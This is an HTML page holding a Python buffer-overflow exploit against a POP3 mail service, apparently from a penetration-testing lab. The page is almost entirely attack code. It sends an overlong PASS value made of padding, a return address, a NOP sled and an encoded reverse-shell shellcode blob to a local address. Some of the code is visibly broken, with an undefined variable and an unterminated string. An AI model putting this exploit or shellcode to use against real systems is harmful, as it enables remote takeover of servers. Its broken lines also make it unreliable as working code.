<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sample script with Shellcode created</title>
</head><body>#!/usr/bin/python <br/>
import socket &nbsp; <br/>
<br/>
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) <br/>
<br/>
<span style="font-family: Noto Mono">shellcode = &nbsp;("\xba\xde\xea\x23\x34\xda\xce\xd9\x74\x24\xf4\x5f\x33\xc9\xb1" <br/>
"\x52\x31\x57\x12\x03\x57\x12\x83\x31\x16\xc1\xc1\x31\x0f\x84" <br/>
"\x2a\xc9\xd0\xe9\xa3\x2c\xe1\x29\xd7\x25\x52\x9a\x93\x6b\x5f" <br/>
"\x51\xf1\x9f\xd4\x17\xde\x90\x5d\x9d\x38\x9f\x5e\x8e\x79\xbe" <br/>
"\xdc\xcd\xad\x60\xdc\x1d\xa0\x61\x19\x43\x49\x33\xf2\x0f\xfc" <br/>
"\xa3\x77\x45\x3d\x48\xcb\x4b\x45\xad\x9c\x6a\x64\x60\x96\x34" <br/>
"\xa6\x83\x7b\x4d\xef\x9b\x98\x68\xb9\x10\x6a\x06\x38\xf0\xa2" <br/>
"\xe7\x97\x3d\x0b\x1a\xe9\x7a\xac\xc5\x9c\x72\xce\x78\xa7\x41" <br/>
"\xac\xa6\x22\x51\x16\x2c\x94\xbd\xa6\xe1\x43\x36\xa4\x4e\x07" <br/>
"\x10\xa9\x51\xc4\x2b\xd5\xda\xeb\xfb\x5f\x98\xcf\xdf\x04\x7a" <br/>
"\x71\x46\xe1\x2d\x8e\x98\x4a\x91\x2a\xd3\x67\xc6\x46\xbe\xef" <br/>
"\x2b\x6b\x40\xf0\x23\xfc\x33\xc2\xec\x56\xdb\x6e\x64\x71\x1c" <br/>
"\x90\x5f\xc5\xb2\x6f\x60\x36\x9b\xab\x34\x66\xb3\x1a\x35\xed" <br/>
"\x43\xa2\xe0\xa2\x13\x0c\x5b\x03\xc3\xec\x0b\xeb\x09\xe3\x74" <br/>
"\x0b\x32\x29\x1d\xa6\xc9\xba\x28\x37\xd1\x3e\x45\x35\xd1\x3f" <br/>
"\x2e\xb0\x37\x55\x40\x95\xe0\xc2\xf9\xbc\x7a\x72\x05\x6b\x07" <br/>
"\xb4\x8d\x98\xf8\x7b\x66\xd4\xea\xec\x86\xa3\x50\xba\x99\x19" <br/>
"\xfc\x20\x0b\xc6\xfc\x2f\x30\x51\xab\x78\x86\xa8\x39\x95\xb1" <br/>
"\x02\x5f\x64\x27\x6c\xdb\xb3\x94\x73\xe2\x36\xa0\x57\xf4\x8e" <br/>
"\x29\xdc\xa0\x5e\x7c\x8a\x1e\x19\xd6\x7c\xc8\xf3\x85\xd6\x9c" <br/>
"\x82\xe5\xe8\xda\x8a\x23\x9f\x02\x3a\x9a\xe6\x3d\xf3\x4a\xef" <br/>
"\x46\xe9\xea\x10\x9d\xa9\x1b\x5b\xbf\x98\xb3\x02\x2a\x99\xd9" <br/>
"\xb4\x81\xde\xe7\x36\x23\x9f\x13\x26\x46\x9a\x58\xe0\xbb\xd6" <br/>
</span><span style="font-family: Noto Mono">"\xf1\x85\xbb\x45\xf1\x8f")</span><br/>
<br/>
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + C * (3500-2606-4-351-16) <br/>
<br/>
try: &nbsp; &nbsp; print "\nSending evil buffer..." &nbsp; &nbsp; <br/>
s.connect(('10.0.0.22',110)) &nbsp; &nbsp; <br/>
data = s.recv(1024) &nbsp; &nbsp; <br/>
s.send('USER username' +'\r\n') &nbsp; &nbsp; <br/>
data = s.recv(1024) &nbsp; &nbsp; <br/>
s.send('PASS ' + buffer + '\r\n') &nbsp; &nbsp; <br/>
s.close() &nbsp; &nbsp; <br/>
print "\ Done. Did you get a reverse shell?" <br/>
<br/>
except: &nbsp; &nbsp; print "Could not connect to POP3<br/>
<br/>
where: <br/>
The shellcode gets placed after the A's, after the memory EIP re-direct, with enough padding to decompile.<br/>
351 is the length of the shellcode created by shakata_ga_nai<br/>
</body></html>